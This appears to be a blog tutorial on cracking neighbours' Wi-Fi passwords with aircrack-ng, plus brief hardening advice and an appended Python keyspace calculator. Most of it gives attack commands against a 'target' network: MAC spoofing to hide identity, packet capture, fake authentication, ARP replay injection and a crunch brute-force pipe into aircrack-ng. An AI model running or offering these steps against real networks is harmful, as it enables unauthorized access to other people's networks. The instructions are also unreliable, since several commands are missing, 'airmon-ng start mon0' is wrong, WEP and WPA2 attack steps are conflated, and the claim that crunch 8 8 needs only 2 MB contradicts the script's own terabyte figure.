How to hack Wi-Fi using aircrack-ng without Wordlist
Hacking and securing Wi-Fi
In this project we will learn about Wi-Fi networks, crack them using Aircrack-ng on a Linux machine, and see whether your Wi-Fi network can be hacked before you run out of wordlist space.
Later we will learn some countermeasures to protect our Wi-Fi networks from these types of attacks.
What is Wi-Fi?
Wi-Fi is a technology that lets two or more systems network without wires and share files and internet access between them.
- A system with an 802.11b/g WLAN driver and hardware.
- A Linux operating system (e.g. Kali Linux, Parrot Security OS or another Linux distribution).
- Aircrack-ng, Crunch and macchanger.
Fire up your system.
Turn on your computer with any Linux OS and log in as the root user. If your PC doesn't have a built-in wireless adapter then you have to arrange a separate 802.11b/g wireless adapter.
Install all required tools on your system by typing this:
apt-get install aircrack-ng && apt-get install crunch && apt-get install macchanger
If these tools are already installed then nothing new will be installed and we can continue to the next step.
Starting Aircrack-ng suite on correct interface
Disconnect from any Wi-Fi network, open a terminal and type
to check the IEEE 802.11 radio interface present on your system. If it doesn't show a mon0 interface then aircrack-ng will not run. But if mon0 is present, you can continue to the next step. Type:
airmon-ng start mon0
This will start the aircrack-ng suite on the mon0 interface.
Hide your identity
Open a new terminal and type:
ifconfig mon0 down
macchanger -r mon0
ifconfig mon0 up
Check Wireless networks around you
Let it run for 30-40 seconds and then terminate it by pressing Ctrl+C. This will show some wireless networks with their:
- Router's MAC address (BSSID)
- Channel (CH)
- Encryption (ENC)
- Amount of data transferred (#DATA)
- Name of the network (ESSID)
Preparing to crack
Check which network has the highest data transfer rate. The more data is being transferred, the better the chances of cracking it successfully.
Open a new terminal. Run this command with the BSSID and CH of your target:
airodump-ng -c CH --bssid BSSID -w testfile mon0
testfile is just an arbitrary name for the capture file from which aircrack-ng will later extract the password; any name can be chosen.
This command tells airodump-ng to capture traffic from that particular BSSID on that CH and save it under the testfile prefix.
Open a new terminal and type this command with the BSSID of your target:
aireplay-ng -1 1 -a BSSID mon0
This requests that the target's router accept packets from our system and keeps the association alive by repeating the request.
Wait till it shows "Auth Successful".
ARP poisoning (ARP spoofing)
ARP (Address Resolution Protocol) poisoning is an attack which sends forged ARP messages onto a local area network.
This results in the linking of an attacker's MAC address with the IP address of a legitimate computer or server on the network. Open a new terminal and type this command with the BSSID of your target:
aireplay-ng -3 -b BSSID mon0
Leave it running and open a new terminal.
The Final Step
We used testfile as our capture file, so the command would be:
The password will start cracking and soon it will show you the correct password.
We used testfile as our capture file. Suppose the password is a minimum of 8 and a maximum of 12 characters long and contains a-z, 0-9 and #@ (this may take terabytes of space before the password is actually cracked; if you know the exact length of the password that helps, for example the command crunch 8 8 | will take only 2 MB). So type the command with the BSSID of your target:
crunch 8 12 abcdefghijklmnopqrstuvwxyz1234567890#@ | aircrack-ng --bssid BSSID -w - testfile-01.cap
Soon it will show you the correct password.
How to secure your Wi-Fi?
- Always use encryption for your wireless network. WEP encryption is quite easy to crack; WPA2-PSK encryption is a must.
- Change your router's default SSID and passwords. Use a complex password with a random combination of uppercase and lowercase letters, numbers and special characters.
- The maximum character limit for a WPA2-PSK passphrase is 63. So use your imagination and make your password as long as possible. A longer password is harder to crack.
- Reboot your router from time to time. It can cause trouble for a hacker 😉
- There is no need for MAC address filtering, as it's easy to bypass; WPA2 encryption is enough.
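As an added example (not part of the original article), the Python script below quantifies the advice above: it computes the keyspace that the article's crunch 8 12 command over its 38-symbol charset enumerates, how much disk that list would occupy, how long exhausting it would take at an assumed guess rate, and checks a candidate passphrase against the length and character-class advice. The 16-character minimum and the 100,000 guesses per second rate are assumptions chosen for illustration.

```python
import string

# Character set used by the article's crunch command: a-z, 0-9, '#' and '@'.
ARTICLE_CHARSET = string.ascii_lowercase + string.digits + "#@"  # 38 symbols


def keyspace(charset_size: int, min_len: int, max_len: int) -> int:
    """Number of candidate passphrases with lengths min_len..max_len."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def wordlist_bytes(charset_size: int, min_len: int, max_len: int) -> int:
    """Bytes crunch would write if the list were stored (one newline per entry)."""
    return sum((n + 1) * charset_size ** n for n in range(min_len, max_len + 1))


def years_to_exhaust(candidates: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at a fixed guessing rate."""
    return candidates / guesses_per_second / (365 * 24 * 3600)


def check_psk(passphrase: str) -> list:
    """Return the ways a passphrase falls short of the hardening advice.

    WPA2-PSK passphrases must be 8..63 printable ASCII characters; the
    16-character minimum below is an assumed local policy, not a standard.
    """
    issues = []
    if not 8 <= len(passphrase) <= 63:
        issues.append("length must be 8-63 characters (WPA2-PSK limit)")
    if len(passphrase) < 16:
        issues.append("shorter than the assumed 16-character minimum")
    if not any(c.isupper() for c in passphrase):
        issues.append("no uppercase letter")
    if not any(c.islower() for c in passphrase):
        issues.append("no lowercase letter")
    if not any(c.isdigit() for c in passphrase):
        issues.append("no digit")
    if not any(c in string.punctuation for c in passphrase):
        issues.append("no special character")
    if not all(32 <= ord(c) <= 126 for c in passphrase):
        issues.append("non-ASCII or control character")
    return issues


if __name__ == "__main__":
    n = len(ARTICLE_CHARSET)
    print(f"crunch 8 8: {keyspace(n, 8, 8):,} candidates, "
          f"{wordlist_bytes(n, 8, 8) / 1e12:.1f} TB on disk")
    print(f"crunch 8 12: {years_to_exhaust(keyspace(n, 8, 12), 1e5):.3g} "
          f"years at an assumed 100,000 WPA2 guesses/s")
    print(check_psk("password"), check_psk("Correct-Horse-Battery-7Staples"))
```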
That’s it Folks! Share it if you liked this article. See you in the Next article.